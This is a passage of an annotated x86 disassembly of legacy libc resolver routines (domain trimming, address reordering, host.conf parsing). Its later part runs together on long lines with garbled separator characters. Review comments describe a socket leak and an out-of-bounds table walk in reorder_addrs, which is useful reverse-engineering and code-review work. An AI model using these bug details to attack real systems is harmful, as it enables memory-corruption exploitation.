        add ebx, 4
loc_804A4D9:                            ; CODE XREF: unsetenv+44j
        add edx, 4
        cmp dword ptr [edx], 0
        jnz short loc_804A4B8
loc_804A4E1:                            ; CODE XREF: unsetenv+29j
        mov dword ptr [ebx], 0          ; terminate the compacted array
        lea esp, [ebp+var_10]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
unsetenv endp
; ---------------------------------------------------------------------------
        db 3 dup(90h)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
dotrimdomain proc near                  ; CODE XREF: trim_domains+14p
                                        ; trim_domains+2Cp ...
var_14 = byte ptr -14h
var_8 = dword ptr -8                    ; current trim suffix
arg_0 = dword ptr 8                     ; hostname (modified in place)
push ebp
mov ebp, esp
sub esp, 8
push edi
push esi
push ebx
xor esi, esi                            ; i = 0
cmp dword_8078520, esi                  ; number of configured trim suffixes
jle short loc_804A574                   ; none: return
nop
loc_804A508:                            ; CODE XREF: dotrimdomain+7Ej
mov eax, ds:dword_807A348[esi*4]        ; suffix = trim_table[i]
mov [ebp+var_8], eax
mov edi, [ebp+var_8]
xor al, al
cld
mov ecx, 0FFFFFFFFh
repne scasb                             ; inline strlen(suffix)
not ecx
mov ebx, ecx
dec ebx                                 ; ebx = strlen(suffix)
mov edi, [ebp+arg_0]
cld
mov ecx, 0FFFFFFFFh
repne scasb                             ; inline strlen(hostname)
not ecx
dec ecx                                 ; ecx = strlen(hostname)
cmp ecx, ebx
jle short loc_804A56B                   ; hostname not longer than the suffix: skip
mov edx, [ebp+var_8]
push edx                                ; arg 2: suffix
add ecx, [ebp+arg_0]
mov eax, ecx
sub eax, ebx
push eax                                ; arg 1: hostname + len - suffixlen
call sub_80565F8                        ; presumably a string compare (strcasecmp-like) - confirm
mov ecx, eax
add esp, 8
test ecx, ecx
jnz short loc_804A56B                   ; tail differs: skip
mov edi, [ebp+arg_0]
xor al, al
cld
mov ecx, 0FFFFFFFFh
repne scasb                             ; strlen(hostname) again
not ecx
mov edx, ecx
dec edx
sub edx, ebx                            ; len - suffixlen
mov eax, [ebp+arg_0]
mov byte ptr [edx+eax], 0               ; hostname[len - suffixlen] = 0: cut the suffix off
loc_804A56B:                            ; CODE XREF: dotrimdomain+40j ; dotrimdomain+5Aj
inc esi
cmp dword_8078520, esi
jg short loc_804A508
loc_804A574:                            ; CODE XREF: dotrimdomain+11j
lea esp, [ebp+var_14]
pop ebx
pop esi
pop edi
mov esp, ebp
pop ebp
retn
dotrimdomain endp
; ---------------------------------------------------------------------------
db 8Dh, 36h                             ; padding: lea esi, [esi]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; trim_domains(hp [arg_0]) -> eax = hp
; Applies dotrimdomain to the string at [hp] and to every pointer in the NULL-terminated
; array at [hp+4]; the layout matches struct hostent (h_name, h_aliases), and the callers are
; gethostbyname / gethostbyaddr.  A no-op when no trim suffix is configured (dword_8078520 == 0).
trim_domains proc near                  ; CODE XREF: gethostbyname+285p ; gethostbyaddr+281p
var_8 = byte ptr -8
arg_0 = dword ptr 8                     ; hp
push ebp
mov ebp, esp
push esi
push ebx
mov esi, [ebp+arg_0]
cmp dword_8078520, 0
jz short loc_804A5BE                    ; nothing configured
mov eax, [esi]                          ; hp->h_name
push eax
call dotrimdomain
xor ebx, ebx                            ; i = 0
add esp, 4
mov eax, [esi+4]                        ; hp->h_aliases
cmp dword ptr [eax], 0
jz short loc_804A5BE                    ; no aliases
lea esi, [esi]                          ; compiler artifact (padding)
loc_804A5A8:                            ; CODE XREF: trim_domains+3Cj
mov eax, [eax+ebx*4]                    ; h_aliases[i]
push eax
call dotrimdomain
add esp, 4
inc ebx
mov eax, [esi+4]
cmp dword ptr [eax+ebx*4], 0
jnz short loc_804A5A8
loc_804A5BE:                            ; CODE XREF: trim_domains+Fj ; trim_domains+24j
mov eax, esi                            ; return hp
lea esp, [ebp+var_8]
pop ebx
pop esi
mov esp, ebp
pop ebp
retn
trim_domains endp
; ---------------------------------------------------------------------------
db 8Dh, 76h, 0                          ; padding: lea esi, [esi+0]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; reorder_addrs(hp [arg_0])
; Moves the first address in [hp+10h] (h_addr_list) that lies on a directly attached network to
; slot 0, swapping it with the current first address (three 4-byte bcopy calls through var_14C).
; dword_8078524 is the interface count: 0 = nothing to do, -1 = interfaces not yet enumerated.
; The first call with -1 performs the enumeration:
;   socket(2, 1, 0) = socket(AF_INET, SOCK_STREAM, 0); ioctl 8912h (SIOCGIFCONF) into the
;   320-byte (140h) buffer var_140, i.e. at most 10 entries of 32 bytes (presumably struct
;   ifreq; hence shr 5 and the +20h stride); per entry: strcpy(name) into the table slot at
;   dword_80793B0, ioctl 891Bh (SIOCGIFNETMASK) then 8915h (SIOCGIFADDR), each checked for
;   sa_family == 2 (AF_INET); entries with a non-zero (addr & mask) are stored as
;   {name, network @+10h, mask @+14h} (18h = 24 bytes each) in unk_80792C0 and dword_8078524
;   is bumped (the first store also turns -1 into 0).  The loop is unrolled by two: one odd
;   leading entry at loc_804A6A4, then pairs from loc_804A764.
; Review notes (documented only, nothing changed):
;  - when ioctl(SIOCGIFCONF) fails the routine jumps straight to the epilogue without close(),
;    so the socket leaks on every call that takes that path.
;  - when no interface qualifies, dword_8078524 stays -1 and the `cmp dword_8078524, 0` after
;    close() does not stop the routine; the matching loop below then uses -1 as a count (ecx is
;    decremented by 1, then by 2, and never reaches 0) and walks dword_80793B0 past the end of
;    unk_80792C0 until a coincidental match or a fault.  The evident intent is "set to 0 and
;    return when nothing was found".
;  - the capacity of unk_80792C0 is not visible here; the 320-byte ifconf buffer bounds the
;    number of stored entries to 10, so the table must hold at least that many.
reorder_addrs proc near                 ; CODE XREF: sub_804BEB0+5Ep ; sub_804BEB0+90p ...
var_174 = byte ptr -174h
var_168 = dword ptr -168h               ; current ifreq pointer (ifr_name)
var_164 = dword ptr -164h               ; unrolled loop: &sa_family of the pair's first entry (ifr_addr)
var_160 = dword ptr -160h               ; unrolled loop: &sin_addr of the first entry (netmask read)
var_15C = dword ptr -15Ch               ; unrolled loop: &sa_family (address read)
var_158 = dword ptr -158h               ; unrolled loop: &sin_addr (address read)
var_154 = dword ptr -154h               ; number of ifreq entries left
var_150 = dword ptr -150h               ; socket fd
var_14C = byte ptr -14Ch                ; 4-byte temporary for the address swap
var_148 = dword ptr -148h               ; ifc_len
var_144 = dword ptr -144h               ; ifc_buf
var_140 = byte ptr -140h                ; 320-byte ifreq buffer
arg_0 = dword ptr 8                     ; hp
push ebp
mov ebp, esp
sub esp, 168h
push edi
push esi
push ebx
cmp dword_8078524, 0
jz loc_804A9C9                          ; no interfaces known: nothing to do
cmp [ebp+arg_0], 0
jz loc_804A9C9                          ; no hostent
cmp dword_8078524, 0FFFFFFFFh
jnz loc_804A8F7                         ; already enumerated
push 0
push 1
push 2
call socket                             ; socket(AF_INET, SOCK_STREAM, 0)
mov [ebp+var_150], eax
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_804A9C9
mov [ebp+var_148], 140h                 ; ifc_len = 320
lea edi, [ebp+var_140]
mov [ebp+var_144], edi                  ; ifc_buf = var_140
lea eax, [ebp+var_148]
push eax
push 8912h                              ; SIOCGIFCONF
mov edi, [ebp+var_150]
push edi
call ioctl
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_804A9C9                          ; failure path: returns without close() (fd leak)
mov edi, [ebp+var_148]
shr edi, 5                              ; ifc_len / 32 = number of entries
mov [ebp+var_154], edi
mov ds:dword_80793B0, offset unk_80792C0 ; table cursor = start of table
mov edi, [ebp+var_144]
mov [ebp+var_168], edi                  ; first ifreq
cmp [ebp+var_154], 0
jz loc_804A8DB                          ; no entries
mov ebx, edi
add ebx, 14h                            ; ebx = &ifreq.ifr_addr.sin_addr (sa_family at ebx-4)
mov eax, [ebp+var_154]
and eax, 1                              ; odd count?
cmp [ebp+var_154], 0
jle short loc_804A6A4
test eax, eax
jz loc_804A747                          ; even count: straight to the pairwise loop
loc_804A6A4:                            ; CODE XREF: reorder_addrs+CEj
mov edi, [ebp+var_168]
push edi
mov eax, ds:dword_80793B0
push eax
call strcpy                             ; strcpy(table_slot, ifr_name)
push edi
push 891Bh                              ; SIOCGIFNETMASK
mov edi, [ebp+var_150]
push edi
call ioctl
add esp, 14h
cmp eax, 0FFFFFFFFh
jz short loc_804A731
cmp word ptr [ebx-4], 2                 ; sa_family == AF_INET ?
jnz short loc_804A731
mov esi, [ebx]                          ; esi = netmask
mov edi, [ebp+var_168]
push edi
push 8915h                              ; SIOCGIFADDR
mov edi, [ebp+var_150]
push edi
call ioctl
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_804A731
cmp word ptr [ebx-4], 2                 ; sa_family == AF_INET ?
jnz short loc_804A731
mov edx, [ebx]
and edx, esi                            ; edx = addr & mask (network)
jz short loc_804A731                    ; skip interfaces with a zero network
mov eax, ds:dword_80793B0
mov [eax+10h], edx                      ; slot.network
mov [eax+14h], esi                      ; slot.mask
cmp dword_8078524, 0FFFFFFFFh
jnz short loc_804A724
mov dword_8078524, 0                    ; first usable interface: -1 -> 0
loc_804A724:                            ; CODE XREF: reorder_addrs+14Cj
add ds:dword_80793B0, 18h               ; next slot
inc dword_8078524
loc_804A731:                            ; CODE XREF: reorder_addrs+102j ; reorder_addrs+109j ...
add ebx, 20h                            ; next ifreq
add [ebp+var_168], 20h
dec [ebp+var_154]
jz loc_804A8DB
loc_804A747:                            ; CODE XREF: reorder_addrs+D2j
mov [ebp+var_158], ebx                  ; set up the four cursors used by the pairwise loop
lea edi, [ebx-4]
mov [ebp+var_15C], edi
mov [ebp+var_160], ebx
mov [ebp+var_164], edi
lea esi, [esi]                          ; compiler artifact (padding)
loc_804A764:                            ; CODE XREF: reorder_addrs+309j
mov edi, [ebp+var_168]                  ; --- first entry of the pair (same steps as loc_804A6A4) ---
push edi
mov eax, ds:dword_80793B0
push eax
call strcpy
push edi
push 891Bh                              ; SIOCGIFNETMASK
mov edi, [ebp+var_150]
push edi
call ioctl
add esp, 14h
cmp eax, 0FFFFFFFFh
jz short loc_804A807
mov edi, [ebp+var_164]
cmp word ptr [edi], 2                   ; AF_INET ?
jnz short loc_804A807
mov edi, [ebp+var_160]
mov ebx, [edi]                          ; ebx = netmask
mov edi, [ebp+var_168]
push edi
push 8915h                              ; SIOCGIFADDR
mov edi, [ebp+var_150]
push edi
call ioctl
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_804A807
mov edi, [ebp+var_15C]
cmp word ptr [edi], 2                   ; AF_INET ?
jnz short loc_804A807
mov edi, [ebp+var_158]
mov edx, [edi]
and edx, ebx                            ; network = addr & mask
jz short loc_804A807
mov eax, ds:dword_80793B0
mov [eax+10h], edx
mov [eax+14h], ebx
cmp dword_8078524, 0FFFFFFFFh
jnz short loc_804A7FA
mov dword_8078524, 0
loc_804A7FA:                            ; CODE XREF: reorder_addrs+222j
add ds:dword_80793B0, 18h
inc dword_8078524
loc_804A807:                            ; CODE XREF: reorder_addrs+1C2j ; reorder_addrs+1CEj ...
mov ebx, [ebp+var_168]                  ; --- second entry of the pair (+20h) ---
add ebx, 20h
push ebx
mov eax, ds:dword_80793B0
push eax
call strcpy
push ebx
push 891Bh                              ; SIOCGIFNETMASK
mov edi, [ebp+var_150]
push edi
call ioctl
add esp, 14h
cmp eax, 0FFFFFFFFh
jz short loc_804A8AB
mov edi, [ebp+var_164]
cmp word ptr [edi+20h], 2               ; AF_INET ?
jnz short loc_804A8AB
mov edi, [ebp+var_160]
mov esi, [edi+20h]                      ; esi = netmask
push ebx
push 8915h                              ; SIOCGIFADDR
mov edi, [ebp+var_150]
push edi
call ioctl
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_804A8AB
mov edi, [ebp+var_15C]
cmp word ptr [edi+20h], 2               ; AF_INET ?
jnz short loc_804A8AB
mov edi, [ebp+var_158]
mov edx, [edi+20h]
and edx, esi                            ; network = addr & mask
jz short loc_804A8AB
mov eax, ds:dword_80793B0
mov [eax+10h], edx
mov [eax+14h], esi
cmp dword_8078524, 0FFFFFFFFh
jnz short loc_804A89E
mov dword_8078524, 0
loc_804A89E:                            ; CODE XREF: reorder_addrs+2C6j
add ds:dword_80793B0, 18h
inc dword_8078524
loc_804A8AB:                            ; CODE XREF: reorder_addrs+268j ; reorder_addrs+275j ...
add [ebp+var_158], 40h                  ; advance all cursors by two entries
add [ebp+var_15C], 40h
add [ebp+var_160], 40h
add [ebp+var_164], 40h
add [ebp+var_168], 40h
add [ebp+var_154], 0FFFFFFFEh           ; remaining -= 2
jnz loc_804A764
loc_804A8DB:                            ; CODE XREF: reorder_addrs+B3j ; reorder_addrs+175j
mov edi, [ebp+var_150]
push edi
call close
add esp, 4
cmp dword_8078524, 0
jz loc_804A9C9                          ; only catches 0; a leftover -1 falls through (see header)
loc_804A8F7:                            ; CODE XREF: reorder_addrs+2Aj
mov edi, [ebp+arg_0]
mov ebx, [edi+10h]                      ; ebx = hp->h_addr_list
test ebx, ebx
jz loc_804A9C9
lea esi, [ebp+var_14C]                  ; esi = &tmp (swap buffer)
nop
loc_804A90C:                            ; CODE XREF: reorder_addrs+3F7j
cmp dword ptr [ebx], 0                  ; end of h_addr_list?
jz loc_804A9C9
mov ds:dword_80793B0, offset unk_80792C0 ; restart at the first table slot
mov ecx, dword_8078524                  ; ecx = remaining slots (unrolled by two, like above)
test ecx, ecx
jz loc_804A9C0
mov eax, ecx
and eax, 1
test ecx, ecx
jle short loc_804A93A                   ; note: -1 also takes this path
test eax, eax
jz short loc_804A958
loc_804A93A:                            ; CODE XREF: reorder_addrs+368j
mov eax, [ebx]
mov edx, ds:dword_80793B0
mov eax, [eax]                          ; eax = *h_addr_list[k] (4-byte IPv4 address)
and eax, [edx+14h]                      ; addr & slot.mask
cmp [edx+10h], eax                      ; == slot.network ?
jz short loc_804A983                    ; on an attached network: swap to the front
add ds:dword_80793B0, 18h
dec ecx
jz short loc_804A9C0
lea esi, [esi]                          ; compiler artifact (padding)
loc_804A958:                            ; CODE XREF: reorder_addrs+36Cj ; reorder_addrs+3F2j
mov eax, [ebx]
mov edx, ds:dword_80793B0
mov eax, [eax]
and eax, [edx+14h]
cmp [edx+10h], eax
jz short loc_804A983
add ds:dword_80793B0, 18h
mov eax, [ebx]
mov edx, ds:dword_80793B0
mov eax, [eax]
and eax, [edx+14h]
cmp [edx+10h], eax
jnz short loc_804A9B4
loc_804A983:                            ; CODE XREF: reorder_addrs+37Ej ; reorder_addrs+39Cj
push 4
push esi
mov edi, [ebp+arg_0]
mov eax, [edi+10h]
mov eax, [eax]
push eax
call bcopy                              ; bcopy(h_addr_list[0], &tmp, 4)
push 4
mov eax, [edi+10h]
mov eax, [eax]
push eax
mov eax, [ebx]
push eax
call bcopy                              ; bcopy(h_addr_list[k], h_addr_list[0], 4)
push 4
mov eax, [ebx]
push eax
push esi
call bcopy                              ; bcopy(&tmp, h_addr_list[k], 4); args dropped by the lea esp below
jmp short loc_804A9C9                   ; done after the first match
; ---------------------------------------------------------------------------
db 8Dh, 76h, 0                          ; padding: lea esi, [esi+0]
; ---------------------------------------------------------------------------
loc_804A9B4:                            ; CODE XREF: reorder_addrs+3B5j
add ds:dword_80793B0, 18h
add ecx, 0FFFFFFFEh                     ; remaining -= 2 (never hits 0 when it started at -1)
jnz short loc_804A958
loc_804A9C0:                            ; CODE XREF: reorder_addrs+35Bj ; reorder_addrs+388j
add ebx, 4                              ; next address
jnz loc_804A90C                         ; pointer is never 0; the real exit is the [ebx] == 0 test at the top
loc_804A9C9:                            ; CODE XREF: reorder_addrs+13j ; reorder_addrs+1Dj ...
lea esp, [ebp+var_174]
pop ebx
pop esi
pop edi
mov esp, ebp
pop ebp
retn
reorder_addrs endp
; ---------------------------------------------------------------------------
db 8Dh, 36h                             ; padding: lea esi, [esi]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
; (locals and body of init_services_resolv continue on the following lines)
init_services_resolv proc near          ; CODE XREF: sub_804BEB0+Fp ; gethostbyname+E1p ...
var_420 = byte ptr -420h var_414 = dword ptr -414h var_410 = dword ptr -410h var_40C = dword ptr -40Ch var_408 = dword ptr -408h var_404 = dword ptr -404h var_400 = byte ptr -400h var_3FC = byte ptr -3FCh var_3FB = byte ptr -3FBh var_3F9 = byte ptr -3F9h push ebp mov ebp, esp sub esp, 414h push edi push esi push ebx xor esi, esi mov [ebp+var_408], offset unk_807A358 call sub_805E954 push offset aResolv_host_co ; "RESOLV_HOST_CONF" call secure_getenv mov [ebp+var_40C], eax add esp, 4 test eax, eax jnz short loc_804AA16 mov [ebp+var_40C], offset aEtcHost_conf ; "/etc/host.conf" loc_804AA16: ; CODE XREF: init_services_resolv+32j push offset aR ; "r" mov eax, [ebp+var_40C] push eax call fopen mov [ebp+var_404], eax add esp, 8 test eax, eax jnz short loc_804AA50 mov ds:dword_8079DD4, 1 mov ds:dword_8079DD8, 0 jmp loc_804B436 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AA50: ; CODE XREF: init_services_resolv+5Aj lea ecx, [ebp+var_400] mov [ebp+var_410], ecx loc_804AA5C: ; CODE XREF: init_services_resolv+CAj ; init_services_resolv+EFj ... 
mov eax, [ebp+var_404] push eax push 400h mov ecx, [ebp+var_410] push ecx call fgets mov edx, eax add esp, 0Ch test edx, edx jz loc_804B41C push 0Ah mov eax, [ebp+var_410] push eax call sub_8057BE8 mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804AA9B mov byte ptr [ebx], 0 loc_804AA9B: ; CODE XREF: init_services_resolv+BEj cmp [ebp+var_400], 23h jz short loc_804AA5C lea ebx, [ebp+var_400] cmp [ebp+var_400], 0 jz short loc_804AACE mov edx, dword_8078FA0 db 8Dh,76h,0 ; lea esi, [esi+0] loc_804AABC: ; CODE XREF: init_services_resolv+F4j movzx eax, byte ptr [ebx] test byte ptr [edx+eax*2+1], 20h jz short loc_804AACE inc ebx jz short loc_804AA5C cmp byte ptr [ebx], 0 jnz short loc_804AABC loc_804AACE: ; CODE XREF: init_services_resolv+D9j ; init_services_resolv+ECj test ebx, ebx jz short loc_804AA5C cmp byte ptr [ebx], 0 jz short loc_804AA5C mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb mov edx, ecx not edx mov [ebp+var_414], edx push edx push ebx mov eax, [ebp+var_410] push eax call sub_8056570 push 5 push offset aOrder ; "order" mov ecx, [ebp+var_410] push ecx call checkbuf mov edx, eax add esp, 18h test edx, edx jnz loc_804AD64 cmp [ebp+var_3FB], 0 jz short loc_804AB3B movzx edx, [ebp+var_3FB] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz loc_804AD64 loc_804AB3B: ; CODE XREF: init_services_resolv+14Aj push offset asc_806791B ; " \t" mov eax, [ebp+var_410] push eax call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz short loc_804AB5B cmp byte ptr [ebx+1], 0 jnz short loc_804AB7D loc_804AB5B: ; CODE XREF: init_services_resolv+17Bj push offset aOrder ; "order" mov ecx, [ebp+var_40C] push ecx push offset aResolvSSComman ; "resolv+: %s: \"%s\" command incorrectly f"... 
push 0Ch push 0Bh mov eax, dword_8078F9C push eax jmp loc_804B3AC ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804AB7C: ; CODE XREF: init_services_resolv+1A8j ; init_services_resolv+1ADj inc ebx loc_804AB7D: ; CODE XREF: init_services_resolv+181j ; init_services_resolv+321j cmp byte ptr [ebx], 20h jz short loc_804AB7C cmp byte ptr [ebx], 9 jz short loc_804AB7C push offset asc_8067950 ; " ,;:" push ebx call strpbrk mov edi, eax add esp, 8 test edi, edi jz short loc_804AB9E mov byte ptr [edi], 0 loc_804AB9E: ; CODE XREF: init_services_resolv+1C1j push 4 push offset aBind ; "bind" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804ABEC cmp byte ptr [ebx+4], 0 jz short loc_804ABC8 movzx edx, byte ptr [ebx+4] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804ABEC loc_804ABC8: ; CODE XREF: init_services_resolv+1DEj mov ds:dword_8079DD4[esi*4], 1 inc esi test byte ptr dword_807854C, 1 jnz loc_804ACF0 call res_init jmp loc_804ACF0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804ABEC: ; CODE XREF: init_services_resolv+1D8j ; init_services_resolv+1EEj push 5 push offset aHosts ; "hosts" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804AC28 cmp byte ptr [ebx+5], 0 jz short loc_804AC16 movzx edx, byte ptr [ebx+5] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804AC28 loc_804AC16: ; CODE XREF: init_services_resolv+22Cj mov ds:dword_8079DD4[esi*4], 2 inc esi jmp loc_804ACF0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804AC28: ; CODE XREF: init_services_resolv+226j ; init_services_resolv+23Cj push 3 push offset aNis ; "nis" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804AC64 cmp byte ptr [ebx+3], 0 jz short loc_804AC52 movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804AC64 loc_804AC52: ; CODE XREF: init_services_resolv+268j mov ds:dword_8079DD4[esi*4], 3 inc esi jmp loc_804ACF0 ; 
陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_804AC64: ; CODE XREF: init_services_resolv+262j ; init_services_resolv+278j push offset aOrder ; "order" mov ecx, [ebp+var_40C] push ecx push offset aResolvSSComman ; "resolv+: %s: \"%s\" command incorrectly f"... push 0Ch push 0Bh mov eax, dword_8078F9C push eax call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf push ebx push offset aResolvSIsAnInv ; "resolv+: \"%s\" is an invalid keyword\n" push 0Dh push 0Bh mov ecx, dword_8078F9C push ecx call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf push offset aNis ; "nis" push offset aHosts ; "hosts" push offset aBind ; "bind" push offset aResolvValidKey ; "resolv+: valid keywords are: %s, %s and"... push 0Eh push 0Bh mov eax, dword_8078F9C push eax call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf add esp, 30h loc_804ACF0: ; CODE XREF: init_services_resolv+203j ; init_services_resolv+20Ej ... test edi, edi jz short loc_804ACFF lea ebx, [edi+1] test ebx, ebx jnz loc_804AB7D loc_804ACFF: ; CODE XREF: init_services_resolv+31Aj test esi, esi jnz loc_804AA5C push offset aOrder ; "order" mov ecx, [ebp+var_40C] push ecx push offset aResolvSSComman ; "resolv+: %s: \"%s\" command incorrectly f"... push 0Ch push 0Bh mov eax, dword_8078F9C push eax call catgets add esp, 10h mov edx, eax push edx push offset unk_80787A4 call fprintf push offset aResolvSearchOr ; "resolv+: search order not specified or "... 
push 0Fh push 0Bh mov ecx, dword_8078F9C push ecx call catgets mov edx, eax push edx push offset unk_80787A4 call fprintf add esp, 28h jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AD64: ; CODE XREF: init_services_resolv+13Dj ; init_services_resolv+15Dj push 5 push offset aMulti ; "multi" mov eax, [ebp+var_410] push eax call checkbuf mov edx, eax add esp, 0Ch test edx, edx jnz loc_804AEA8 cmp [ebp+var_3FB], 0 jz short loc_804ADA4 movzx edx, [ebp+var_3FB] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz loc_804AEA8 loc_804ADA4: ; CODE XREF: init_services_resolv+3B3j push offset asc_806791B ; " \t" mov ecx, [ebp+var_410] push ecx call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz loc_804AE9C cmp byte ptr [ebx], 0 jz short loc_804ADE6 mov edx, dword_8078FA0 db 8Dh,76h,0 ; lea esi, [esi+0] loc_804ADD0: ; CODE XREF: init_services_resolv+40Cj movzx eax, byte ptr [ebx] test byte ptr [edx+eax*2+1], 20h jz short loc_804ADE6 inc ebx jz loc_804AE9C cmp byte ptr [ebx], 0 jnz short loc_804ADD0 loc_804ADE6: ; CODE XREF: init_services_resolv+3EDj ; init_services_resolv+400j test ebx, ebx jz loc_804AE9C cmp byte ptr [ebx], 0 jz loc_804AE9C mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFCh jnz short loc_804AE44 push 2 push offset aOn ; "on" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804AE44 cmp byte ptr [ebx+2], 0 jz short loc_804AE32 movzx edx, byte ptr [ebx+2] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804AE44 loc_804AE32: ; CODE XREF: init_services_resolv+448j mov dword_8078510, 1 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 76h, 0 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AE44: ; CODE XREF: init_services_resolv+42Ej ; init_services_resolv+442j ... 
mov edi, ebx xor al, al cld mov ecx, 0FFFFFFFFh repne scasb cmp ecx, 0FFFFFFFBh jnz short loc_804AE90 push 3 push offset aOff ; "off" push ebx call checkbuf add esp, 0Ch test eax, eax jnz short loc_804AE90 cmp byte ptr [ebx+3], 0 jz short loc_804AE7F movzx edx, byte ptr [ebx+3] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz short loc_804AE90 loc_804AE7F: ; CODE XREF: init_services_resolv+495j mov dword_8078510, 0 jmp loc_804AA5C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AE90: ; CODE XREF: init_services_resolv+47Bj ; init_services_resolv+48Fj ... push offset aMulti ; "multi" jmp loc_804B261 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AE9C: ; CODE XREF: init_services_resolv+3E4j ; init_services_resolv+403j ... push offset aMulti ; "multi" jmp loc_804B395 ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_804AEA8: ; CODE XREF: init_services_resolv+3A6j ; init_services_resolv+3C6j push 7 push offset aNospoof ; "nospoof" mov eax, [ebp+var_410] push eax call checkbuf mov edx, eax add esp, 0Ch test edx, edx jnz loc_804AFEC cmp [ebp+var_3F9], 0 jz short loc_804AEE8 movzx edx, [ebp+var_3F9] mov eax, dword_8078FA0 test byte ptr [eax+edx*2+1], 20h jz loc_804AFEC loc_804AEE8: ; CODE XREF: init_services_resolv+4F7j push offset asc_806791B ; " \t" mov ecx, [ebp+var_410] push ecx call strpbrk mov ebx, eax add esp, 8 test ebx, ebx jz loc_804AFE0 cmp byte ptr [ebx], 0 jz short loc_804AF2A mov edx, dword_8078FA0 db 8Dh,76h,0 ; lea esi, [esi+0] loc_804AF14: ; CODE XREF: init_services_resolv+550j movzx eax, byte ptr [ebx] test byte ptr [edx+eax*2+1], 20h jz short loc_804AF2A inc ebx jz loc_804AFE0 cmp byte ptr [ebx], 0 jnz short loc_804AF14 loc_804AF2A: ; CODE XREF: init_services_resolv+531j ; init_services_resolv+544j test ebx, ebx jz loc_804AFE0 cmp byte ptr [ebx], 0 jz loc_804AFE0 mov edi, ebx xor al, al cld mov 
